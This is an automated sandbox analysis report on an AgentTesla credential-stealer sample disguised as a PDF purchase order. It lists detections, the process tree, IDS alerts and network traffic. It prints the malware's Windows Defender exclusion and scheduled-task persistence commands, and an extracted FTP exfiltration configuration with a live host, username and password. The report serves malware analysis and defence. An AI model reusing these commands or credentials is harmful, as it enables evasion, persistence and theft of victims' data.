Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z38PO_20248099-1_pdf.exe

Overview

General Information

Sample name:z38PO_20248099-1_pdf.exe
Analysis ID:1518233
MD5:5d5b5ecc06b9058d0ec3199ed8617cfe
SHA1:cbb1a95878e8a7a4ac09270a6dc7699c78996e28
SHA256:0a58b574ccfb2898c4ee47a8dab29174c2193731573d4578b7b5ff83ad1196d6
Tags:AgentTeslaexeuser-Porcupine
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z38PO_20248099-1_pdf.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7868 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7964 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • z38PO_20248099-1_pdf.exe (PID: 8068 cmdline: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • z38PO_20248099-1_pdf.exe (PID: 8096 cmdline: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
  • FrFvspxoHsPs.exe (PID: 8172 cmdline: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • schtasks.exe (PID: 5212 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • FrFvspxoHsPs.exe (PID: 764 cmdline: "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
  • sgxIb.exe (PID: 1792 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • schtasks.exe (PID: 2320 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 3236 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
  • sgxIb.exe (PID: 3592 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
    • schtasks.exe (PID: 1292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 4216 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 5D5B5ECC06B9058D0EC3199ED8617CFE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 23 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3317c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x331ee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33278:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3330a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33374:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x333e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3347c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3350c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x30370:$s2: GetPrivateProfileString
                  • 0x2f9fa:$s3: get_OSFullName
                  • 0x3116b:$s5: remove_Key
                  • 0x31357:$s5: remove_Key
                  • 0x32275:$s6: FtpWebRequest
                  • 0x3315e:$s7: logins
                  • 0x336d0:$s7: logins
                  • 0x36427:$s7: logins
                  • 0x36493:$s7: logins
                  • 0x37f12:$s7: logins
                  • 0x3702d:$s9: 1.85 (Hash, version 2, native byte-order)
                  19.2.sgxIb.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ProcessId: 7816, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ProcessId: 8096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ProcessId: 7816, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, ParentImage: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, ParentProcessId: 8172, ParentProcessName: FrFvspxoHsPs.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp", ProcessId: 5212, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", ProcessId: 7964, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ProcessId: 7816, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe", ParentImage: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, ParentProcessId: 7644, ParentProcessName: z38PO_20248099-1_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp", ProcessId: 7964, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-25T14:42:33.783691+020020299271A Network Trojan was detected192.168.2.949717110.4.45.19721TCP
                    2024-09-25T14:42:39.600523+020020299271A Network Trojan was detected192.168.2.949723110.4.45.19721TCP
                    2024-09-25T14:42:48.225577+020020299271A Network Trojan was detected192.168.2.955430110.4.45.19721TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-25T14:42:34.626804+020028555421A Network Trojan was detected192.168.2.949719110.4.45.19758009TCP
                    2024-09-25T14:42:34.633344+020028555421A Network Trojan was detected192.168.2.949719110.4.45.19758009TCP
                    2024-09-25T14:42:40.450522+020028555421A Network Trojan was detected192.168.2.949726110.4.45.19753264TCP
                    2024-09-25T14:42:40.459740+020028555421A Network Trojan was detected192.168.2.949726110.4.45.19753264TCP
                    2024-09-25T14:42:49.076789+020028555421A Network Trojan was detected192.168.2.955431110.4.45.19754539TCP
                    2024-09-25T14:42:49.082015+020028555421A Network Trojan was detected192.168.2.955431110.4.45.19754539TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 19.2.sgxIb.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeReversingLabs: Detection: 65%
                    Multi AV Scanner detection for submitted file
                    Source: z38PO_20248099-1_pdf.exeReversingLabs: Detection: 65%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: z38PO_20248099-1_pdf.exeJoe Sandbox ML: detected
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:55429 version: TLS 1.2
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: xaHV.pdbSHA256? source: z38PO_20248099-1_pdf.exe, FrFvspxoHsPs.exe.0.dr, sgxIb.exe.10.dr
                    Source: Binary string: xaHV.pdb source: z38PO_20248099-1_pdf.exe, FrFvspxoHsPs.exe.0.dr, sgxIb.exe.10.dr
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 4x nop then jmp 07114AC0h0_2_071145C0
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 4x nop then inc dword ptr [ebp-0Ch]11_2_055C5454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 06D93D60h21_2_06D93860

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:55431 -> 110.4.45.197:54539
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49719 -> 110.4.45.197:58009
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49717 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:55430 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49723 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49726 -> 110.4.45.197:53264
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 110.4.45.197 ports 65044,63289,57088,53264,60779,54891,58978,52851,59326,54510,57687,50852,55829,54539,1,56820,51370,60205,60403,54484,2,58009,63809,56189,51237,50701,60062,21
                    Source: global trafficTCP traffic: 192.168.2.9:49715 -> 110.4.45.197:54484
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.9:49712 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 20:42. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 20:42. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002AD3000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.00000000035CD000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003681000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.000000000358E000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000330B000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1446067123.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000B.00000002.1494492070.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000010.00000002.1556961678.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000015.00000002.1639610353.0000000002625000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
